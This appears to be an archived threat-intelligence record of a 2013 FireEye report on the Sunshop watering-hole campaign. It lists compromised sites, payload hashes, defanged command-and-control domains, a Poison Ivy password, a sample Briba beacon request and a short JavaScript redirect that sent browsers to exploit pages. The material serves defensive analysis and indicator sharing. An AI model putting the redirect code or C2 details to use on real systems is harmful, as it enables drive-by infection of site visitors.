{
	"id": "20d1567e-d899-4fcd-9550-21c221ff92cb",
	"created_at": "2026-04-06T00:09:33.232811Z",
	"updated_at": "2026-04-10T03:31:13.336006Z",
	"deleted_at": null,
	"sha1_hash": "e2b672c9d5a0f76ce01d12f69a0d2c0a5891a936",
	"title": "Ready for Summer: The Sunshop Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 46936,
	"plain_text": "Ready for Summer: The Sunshop Campaign\r\nBy by Ned Moran\r\nPublished: 2013-05-20 · Archived: 2026-04-05 19:41:38 UTC\r\nFireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer\r\nzero-day, CVE-2013-1347, as well as recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign\r\nappears to have affected a number of victims based on the use of the Internet Explorer zero-day as well as the amount of\r\ntraffic observed at making requests to the exploit server. This attack was likely executed by an actor we have named the\r\n'Sunshop Group'. This actor was also responsible for the 2010 compromise of the Nobel Peace Prize website that leverage a\r\nzero-day in Mozilla Firefox.\r\nImpacted Sites\r\nThe campaign in question compromised a number of strategic websites including:\r\n• Multiple Korean military and strategy think tanks\r\n• A Uyghur news and discussion forum\r\n• A science and technology policy journal\r\n• A website for evangelical students\r\nA call to a malicious javascript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised\r\nwebsites.\r\nThe Exploit Server\r\nIf a visitor to one of these compromised website was running Internet Explorer 8.0 the malicious javascript would redirect\r\nthem to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. Any other victims were redirected to a page\r\nthat downloaded two malicious jars.\r\nif(browser==\"Microsoft Internet Explorer\" \u0026\u0026 trim_Version==\"MSIE8.0\" \u0026\u0026\r\nwindow.navigator.userLanguage.indexOf(\"en\")\u003e-1)\r\n{\r\nif(sys_Version==\"WindowsNT5.1\")\r\n{\r\nshowexp(\"hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxximg.html\");\r\n}\r\nelse\r\nshowexp(\"hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html\");//J\r\n}\r\nelse\r\nshowexp(\"hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html\");//J\r\nDropped Payloads and C\u0026C Infrastructure\r\nThe Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at\r\nhk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and\r\ncontrol server at dns[.]homesvr[.]tk.\r\nThe java exploits were packaged as two different jar files. One jar file had a MD5 of f4bee1e845137531f18c226d118e06d7\r\nand exploited CVE-2013-2423. The second jar file had a MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited\r\nCVE-2013-1493.\r\nhttps://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html\r\nPage 1 of 3\n\nThe jar that exploited CVE-2013-2423 dropped a 9002 RAT with a MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT\r\nconnected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped\r\na 9002 RAT with a MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at\r\nssl[.]homesvr[.]tk.\r\nAll of the above 9002 command and control domains resolved to 58.64.205.53. We previously discussed the extensive use\r\nof this RAT in other advanced persistent threat (APT) campaigns here.\r\nRelated Infrastructure\r\nAfter further research into 58.64.205.53 with our friends at Mandiant we uncovered a Briba sample with the MD5\r\n6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to this IP address. As seen in this malwr report, the command and\r\ncontrol domain of nameserver1[.]zapto[.]org resolved to the same 58.64.205.53 IP address on 2013-05-07. This Briba\r\nsample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:\r\nPOST /index000001021.asp HTTP/1.1\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)\r\nHost: update.microsoft.com\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nContent-Length: 000041\r\nFor a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.\r\nThe exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had a\r\nMD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5\r\n2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at\r\n9ijhh45[.]zapto[.]org over port 443 using a password of ‘ult4life’. This domain resolved to the same 58.64.205.53 IP\r\nbetween April 2nd and 8th.\r\nAttribution\r\nThe Sunshop Group has utilized the same tactics described above in previous targeted attack campaigns. These similar\r\ntactics include the use of zero-day exploits, strategic web compromise as well as Briba malware.\r\nOne of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee’s\r\nwebsite in 2010.This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.\r\nAnother publicly documented attack exploited a Flash zero-day and can be found here. Mila at the Contagio Blog posted\r\nadditional information on this attack here. This attack dropped the same Briba payload discussed above.\r\nFireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.\r\nMalware\r\nCVE Exploit hash Payload hash\r\nMalware\r\nfamily\r\nC\u0026C Host\r\nCVE-2013-\r\n1347\r\nCVE-2013-\r\n1347\r\nfb24c49299b197e1b56a1a51430aea26\r\nfb24c49299b197e1b56a1a51430aea26\r\nb0ef2ab86f160aa416184c09df8388fe\r\nb0ef2ab86f160aa416184c09df8388fe\r\n9002\r\n9002\r\ndns[.]homesvr[.]tk\r\ndns[.]homesvr[.]tk\r\nCVE-2013-\r\n2423\r\nCVE-f4bee1e845137531f18c226d118e06d7\r\nf4bee1e845137531f18c226d118e06d7\r\nd99ed31af1e0ad6fb5bf0f116063e91f\r\nd99ed31af1e0ad6fb5bf0f116063e91f\r\n9002\r\n9002\r\nasp[.]homesvr[.]linkpc[.]net\r\nasp[.]homesvr[.]linkpc[.]net\r\nhttps://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html\r\nPage 2 of 3\n\n2013-\r\n2423\r\nCVE-2013-\r\n1493\r\nCVE-2013-\r\n1493\r\n3fbb7321d8610c6e2d990bb25ce34bec\r\n3fbb7321d8610c6e2d990bb25ce34bec\r\n42bd5e7e8f74c15873ff0f4a9ce974cd\r\n42bd5e7e8f74c15873ff0f4a9ce974cd\r\n9002\r\n9002\r\nssl[.]homesvr[.]tk\r\nssl[.]homesvr[.]tk\r\nUnknown\r\nUnknown\r\nUnknown Unknown\r\n6fe0f6e68cd9cc6ed7e100e7b3626665\r\n6fe0f6e68cd9cc6ed7e100e7b3626665\r\nBriba\r\nBriba\r\nnameserver1[.]zapto[.]org\r\nnameserver1[.]zapto[.]org\r\nCVE-2013-\r\n1493\r\nCVE-2013-\r\n1493\r\n51aff823274e9d12b1a9a4bbbaf8ce00\r\n51aff823274e9d12b1a9a4bbbaf8ce00\r\n2B6605B89EAD179710565D1C2B614665\r\n2B6605B89EAD179710565D1C2B614665\r\nPoison\r\nIvy\r\nPoison\r\nIvy\r\n9ijhh45[.]zapto[.]org\r\n9ijhh45[.]zapto[.]org\r\nSource: https://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.htm\r\nl\r\nhttps://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html\r\nPage 3 of 3\n\nCVE\u0002 2013-   \n1493 3fbb7321d8610c6e2d990bb25ce34bec 42bd5e7e8f74c15873ff0f4a9ce974cd 9002 ssl[.]homesvr[.]tk\nCVE\u0002 3fbb7321d8610c6e2d990bb25ce34bec 42bd5e7e8f74c15873ff0f4a9ce974cd 9002 ssl[.]homesvr[.]tk\n2013-   \n1493   \nUnknown  6fe0f6e68cd9cc6ed7e100e7b3626665 Briba nameserver1[.]zapto[.]org\n Unknown Unknown  \nUnknown  6fe0f6e68cd9cc6ed7e100e7b3626665 Briba nameserver1[.]zapto[.]org\nCVE\u0002   \n2013-   Poison\n1493 51aff823274e9d12b1a9a4bbbaf8ce00 2B6605B89EAD179710565D1C2B614665 Ivy 9ijhh45[.]zapto[.]org\nCVE\u0002 51aff823274e9d12b1a9a4bbbaf8ce00 2B6605B89EAD179710565D1C2B614665 Poison 9ijhh45[.]zapto[.]org\n2013-   Ivy\n1493   \nSource: https://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.htm   \nl   \n  Page 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html"
	],
	"report_names": [
		"ready-for-summer-the-sunshop-campaign.html"
	],
	"threat_actors": [
		{
			"id": "1f3cf3d1-4764-4158-a216-dd6352e671bb",
			"created_at": "2022-10-25T15:50:23.837615Z",
			"updated_at": "2026-04-10T02:00:05.322197Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"APT19",
				"Codoso",
				"C0d0so0",
				"Codoso Team",
				"Sunshop Group"
			],
			"source_name": "MITRE:APT19",
			"tools": [
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f",
			"created_at": "2022-10-25T16:07:23.335869Z",
			"updated_at": "2026-04-10T02:00:04.547702Z",
			"deleted_at": null,
			"main_name": "APT 19",
			"aliases": [
				"APT 19",
				"Bronze Firestone",
				"C0d0so0",
				"Checkered Typhoon",
				"Codoso",
				"Deep Panda",
				"G0009",
				"G0073",
				"Operation Kingslayer",
				"Red Pegasus",
				"Sunshop Group",
				"TG-3551"
			],
			"source_name": "ETDA:APT 19",
			"tools": [
				"Agentemis",
				"C0d0so0",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"EmPyre",
				"EmpireProject",
				"Fire Chili",
				"PowerShell Empire",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434173,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e2b672c9d5a0f76ce01d12f69a0d2c0a5891a936.pdf",
		"text": "https://archive.orkl.eu/e2b672c9d5a0f76ce01d12f69a0d2c0a5891a936.txt",
		"img": "https://archive.orkl.eu/e2b672c9d5a0f76ce01d12f69a0d2c0a5891a936.jpg"
	}
}